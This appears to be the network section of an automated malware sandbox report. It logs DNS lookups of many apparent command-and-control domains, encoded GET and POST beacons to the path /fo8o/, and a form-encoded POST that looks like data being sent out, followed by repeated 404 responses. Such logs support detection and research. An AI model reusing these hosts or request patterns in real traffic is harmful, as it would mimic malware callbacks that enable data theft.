Source: global traffic	HTTP traffic detected: GET /fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 193Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 45 72 63 2b 68 39 51 77 70 59 45 4b 41 6b 77 46 52 65 6f 66 48 4b 34 78 55 42 50 Data Ascii: FBEd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffErc+h9QwpYEKAkwFReofHK4xUBP

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 08:49:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 08:49:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:17 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:19 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:49:25 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:01 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:04 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:09 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-08T08:50:14.0491826Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 08 May 2024 08:50:11 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-08T08:50:16.9082388Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:41 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:44 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:47 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:50 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:56 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
